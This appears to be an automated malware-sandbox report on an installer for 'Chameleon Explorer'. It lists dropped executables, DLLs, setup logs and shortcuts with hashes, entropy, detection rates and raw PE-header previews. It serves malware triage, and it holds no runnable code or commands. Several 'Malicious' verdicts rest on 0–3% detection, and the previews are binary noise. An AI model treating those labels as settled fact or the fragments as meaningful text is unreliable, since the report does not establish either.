                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1226272
                                                                                                          Entropy (8bit):5.8428341731794005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                          MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                          SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                          SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                          SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4644456
                                                                                                          Entropy (8bit):6.624930231136082
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                          MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                          SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                          SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):768032
                                                                                                          Entropy (8bit):6.537086415352977
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                          MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                          SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                          SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                          SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                          SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1226272
                                                                                                          Entropy (8bit):5.8428341731794005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                          MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                          SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                          SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                          SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15091304
                                                                                                          Entropy (8bit):6.181292047546881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                          MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                          SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                          SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..|.......h4................................... ..(....................}..........|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1185824
                                                                                                          Entropy (8bit):6.406882852477582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                          MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                          SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                          SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                          SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):146536
                                                                                                          Entropy (8bit):5.3703743168809845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                          MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                          SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                          SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                          SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:InnoSetup Log Chameleon Explorer {96C45BE0-C1AA-41B3-B161-F331DBC29B84-, version 0x418, 52557 bytes, 760639\37\user\376, C:\Program Files (x86)\Chameleon Explorer\
                                                                                                          Category:dropped
                                                                                                          Size (bytes):52557
                                                                                                          Entropy (8bit):3.91675511926424
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:+FYAxWNrPuxwK2BBnE9IuIuhqjulh9LbN:Cxkixl2BBnE9IuIuhk4F
                                                                                                          MD5:B0BE17F67B2F945FFF1D288D9790A7B7
                                                                                                          SHA1:527D26D53487E2E0C3ACBD75637EAE248C981AFD
                                                                                                          SHA-256:7F95F61F2FC21B50DD0618C0E3120DB23857F26820322F418FDB521EB0665DA5
                                                                                                          SHA-512:C1EFBB507B8B0D4A90577CE1C6BBB7BDEE0B30DEC67F397E3432D26EE70609ABFFB0837DC151CBD6D37DC2538649FBDDDAC95A409E328D0E73A8697BEC43C343
                                                                                                          Malicious:false
                                                                                                          Preview:Inno Setup Uninstall Log (b)....................................{96C45BE0-C1AA-41B3-B161-F331DBC29B84-explorer}}................................................................................Chameleon Explorer......................................................................................................................M...%...........................................................................................................................2..................7.6.0.6.3.9......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r....................... ...........M..IFPS....A.......!.......................................................................................................................................................BOOLEAN..............TWIZARDPAGE....TWIZARDPAGE.........TCHECKBOX....TCHECKBOX.........TBUTTON....TBUTTON.........TLABEL....TLABEL.........TEXECWAIT.........TOBJECT....TOBJECT.........TCONTROL....TCONTROL..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1185824
                                                                                                          Entropy (8bit):6.406882852477582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                          MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                          SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                          SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                          SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:InnoSetup messages, version 5.5.3, 221 messages (UTF-16), &About Setup...
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22709
                                                                                                          Entropy (8bit):3.2704486925356004
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Q41EjXgkg3Sqf8sfr69FT0AKanzLYfMa1tzvL7Vzo+Fc51USQDztXfbKJUfvo:Q41Elvqf9r6fKVfMmRo+y1USQDztP3o
                                                                                                          MD5:79173DA528082489A43F39CF200A7647
                                                                                                          SHA1:AA253B477CE2BF9D886D07694CD5DDB7C7FE9EEC
                                                                                                          SHA-256:4F36E6BE09CD12E825C2A12AB33544744E7256C9094D7149258EA926705E8FFD
                                                                                                          SHA-512:C46EB9DD3D03A993FDC4F65AE2751ECFDCB1FB6E1FB69A119105FD40290CE5EC4427B04F813EED47415390689943D05B5432D4571B1ACA0CE37EE52391790D18
                                                                                                          Malicious:false
                                                                                                          Preview:Inno Setup Messages (5.5.3) (u).....................................hX..........&.A.b.o.u.t. .S.e.t.u.p.........%.1. .v.e.r.s.i.o.n. .%.2.....%.3.........%.1. .h.o.m.e. .p.a.g.e.:.....%.4.....A.b.o.u.t. .S.e.t.u.p...Y.o.u. .m.u.s.t. .b.e. .l.o.g.g.e.d. .i.n. .a.s. .a.n. .a.d.m.i.n.i.s.t.r.a.t.o.r. .w.h.e.n. .i.n.s.t.a.l.l.i.n.g. .t.h.i.s. .p.r.o.g.r.a.m.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s... .A.f.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Jan 2 00:27:04 2025, mtime=Thu Jan 2 00:27:04 2025, atime=Sat Dec 24 18:19:16 2016, length=15091304, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1213
                                                                                                          Entropy (8bit):4.571410063493943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:8mMpCE/mERudOEAvF1jXlAuLdQdCHqhdCVUUPX/qyFm:8mM0QZRudORvFNXOuxQdCKhdCWFyF
                                                                                                          MD5:8FF99D906314FD2F3619BBAFA847FDB9
                                                                                                          SHA1:C57A517CEEC6C945883AFC0DCED2D4850843DDD2
                                                                                                          SHA-256:B41A5780D211D0AFCEFCF31440B6368FFB506178F5BC77549452320287B27B6B
                                                                                                          SHA-512:87B818C1752BF01748DCCFCBF308A3B8CAC78B2CC6FD6C71656AB25404F465802C835FFE3EB78357C974A4F2DF3D0EB7A730E3C9C832DEA1329494043C7F1722
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... ...2..n.\...5:n.\.......^..hF...........................P.O. .:i.....+00.../C:\.....................1....."Z[...PROGRA~2.........O.I"Z[.....................V.....{.O.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1....."Zc...CHAMEL~1..V......"Zc."Zc.....L.......................K.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......"Zc."Zc.....S.........................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m..............c.....C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..N.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z|...K.J.........`.......X.......760639...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,.......
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Jan 2 00:27:04 2025, mtime=Thu Jan 2 00:27:05 2025, atime=Sat Dec 24 18:19:16 2016, length=15091304, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1195
                                                                                                          Entropy (8bit):4.580157429543419
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:8mMpPkyE/WE3dOEAvF1jXlAuLd3dCHqhdCVUUPX/qyFm:8mMayQJ3dORvFNXOux3dCKhdCWFyF
                                                                                                          MD5:DEA82222B779325FDD4685812EB06675
                                                                                                          SHA1:C9C38F568D4091538EAF2B27E2C487428145F976
                                                                                                          SHA-256:3271DA6926100D8B60FE681A5D09B1B93CC5EC25558678B336E5888320529EF4
                                                                                                          SHA-512:A5EFE3743F0E602B6E82AC5D003A16EA0593A6109FCB00ACEDC79D26186CB347B9FEF36FF2B4354CD2F79FE760D0C3722877B3F1E3284595644C93DAE6D7D0AC
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... ...2..n.\..C..n.\.......^..hF...........................P.O. .:i.....+00.../C:\.....................1....."Zc...PROGRA~2.........O.I"Zc.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1....."Zc...CHAMEL~1..V......"Zc."Zc.....L.......................K.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......"Zc."Zc.....S.........................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m..............c.....C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..E.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z|...K.J.........`.......X.......760639...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.X
                                                                                                          Process:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6860752
                                                                                                          Entropy (8bit):7.995791234867719
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                          MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                          SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                          SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                          SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W..................................... ....@...................................i...@......@....................................................h. ............................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc................(..............@..@....................................@..@........................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):255462
                                                                                                          Entropy (8bit):7.943827191529715
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:yBncP2kES3/XHPQNUN24xJVbMk0g0kP/qKwea:0nC/XHPQG7MQXwH
                                                                                                          MD5:B4E82FAD7534ABCEE800BF3D2EE4D438
                                                                                                          SHA1:A0767223D5C8883F743F2C5574A2B57EE5218925
                                                                                                          SHA-256:27AD880237FF085DBCC9EC6E9664277315C60466DBF3FF5F596E184E36472DDA
                                                                                                          SHA-512:D262C516915C0114FA5D9644277EE764A8F6BB3F887252F3AA0C7F9A74A4444BACA22854A4F23C4303BCC4C26F0BFAF6910D7CA0C562F7F3EC1809AEE68EAD33
                                                                                                          Malicious:false
                                                                                                          Preview:EA06...`.....................Z..F@.~.@.!......'.!.@i...R.i....+}..a..,v.u..t.X...... ...J}NAm..,..l6.$.D.....\.z.H.&...&&...O$:<M.. ..t...J.c... ..]B...S 08......k....ap.4.... ....................@.$........P.......X...`.#`.......<.P... ..F...3......M...~)... .e....Q...[... .p ..8...d......]d.., ..0.....d......q..\.w+..`...f....F@.>..'....3..S.P....]D.S.:.........\...................HwW.O.O=.....O..?T....O...4....O.o...|..O...T...O..=....A|.{)..O.....i.y...c.......y....;.}?.........!.~i.-....~i......{).Jo.Y............x.}?...S.@........>.}....c...\...v}..8...|)..... .....j..i......Pj...~._..9..~.u..n..};........O..L...... b.........T.E..O..T....B..#....3...$..~C...@....!<.|).&..z%t....F.v04h...E.`=.>..5J..(.a.,.8.x.3.G........h....U-..@.5w.Q....BA....|.......r.....!%..)...H....-.!@..6.........T..k...J.....5`...........Z..kx..L...@.5...?.X .e.............Q...(..e.....5T............Q@.jX..Z.....5.......0.....`.....R@.kh..A...@.5..H..e.......`.......2..Z`.s.....
                                                                                                          Process:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1185824
                                                                                                          Entropy (8bit):6.406882852477582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                          MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                          SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                          SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                          SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
